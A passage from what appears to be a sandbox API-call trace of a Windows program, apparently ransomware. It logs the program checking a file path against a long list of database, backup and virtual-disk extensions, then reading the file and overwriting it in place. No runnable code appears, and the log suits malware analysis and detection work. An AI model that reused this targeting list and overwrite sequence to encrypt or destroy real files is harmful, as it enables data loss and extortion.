lpSrch=".db3") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dbc") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dbf") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dbs") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dbt") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dbv") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dbx") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dcb") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dct") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dcx") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ddl") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dlis") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dp1") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dqy") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dsk") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dsn") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dtsx") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dxl") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".eco") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ecx") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".edb") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".epim") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".exb") returned 0x0 [0157.974] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fcd") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fdb") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fic") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fmp") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fmp12") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fmpsl") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fol") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fp3") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fp4") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fp5") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fp7") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fpt") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".frm") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".gdb") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".grdb") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".gwi") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".hdb") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".his") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ib") returned 0x0 [0157.975] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".idb") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ihx") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".itdb") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".itw") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".jet") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".jtx") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".kdb") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".kexi") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".kexic") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".kexis") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".lgc") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".lwx") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".maf") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".maq") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mar") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mas") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mav") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mdb") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mdf") returned 0x0 [0157.976] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mpd") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mrg") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mud") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mwb") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".myd") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ndf") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".nnt") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".nrmlib") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ns2") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ns3") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ns4") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".nsf") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".nv") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".nv2") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".nwdb") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".nyf") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".odb") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".oqy") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".orx") returned 0x0 [0157.977] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".owc") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".p96") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".p97") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".pan") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".pdb") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".pdm") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".pnz") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".qry") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".qvd") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".rbf") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".rctd") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".rod") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".rodx") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".rpd") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".rsd") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sas7bdat") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sbf") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".scx") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sdb") returned 0x0 [0157.978] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sdc") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sdf") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sis") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".spq") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sql") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sqlite") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sqlite3") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".sqlitedb") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".te") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".temx") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".tmd") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".tps") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".trc") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".trm") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".udb") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".udl") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".usr") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".v12") returned 0x0 [0157.979] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vis") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vpd") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vvv") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".wdb") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".wmdb") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".wrk") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".xdb") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".xld") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".xmlff") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".abcddb") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".abs") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".abx") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".accdw") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".adn") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".db2") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".fm5") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".hjt") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".icg") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".icr") returned 0x0 [0157.980] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".kdb") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".lut") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".maw") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mdn") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".mdt") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vdi") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vhd") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vmdk") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".pvm") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vmem") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vmsn") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vmsd") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".nvram") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vmx") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".raw") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".qcow2") returned 0x0 [0157.981] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".subvol") returned 0x0 [0157.982] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".bin") returned 0x0 [0157.982] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vsv") returned 0x0 [0157.982] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".avhd") returned 0x0 [0157.982] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vmrs") returned 0x0 [0157.982] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vhdx") returned 0x0 [0157.982] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".avdx") returned 0x0 [0157.982] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".vmcx") returned 0x0 [0157.982] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".iso") returned 0x0 [0157.982] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.982] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0158.091] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0158.091] SetEndOfFile (hFile=0x6ec) returned 1 [0158.091] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.091] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x32b, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x32b, lpOverlapped=0x0) returned 1 [0158.092] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xfffffcd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.092] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x32b, lpOverlapped=0x0) returned 1 [0158.092] CloseHandle 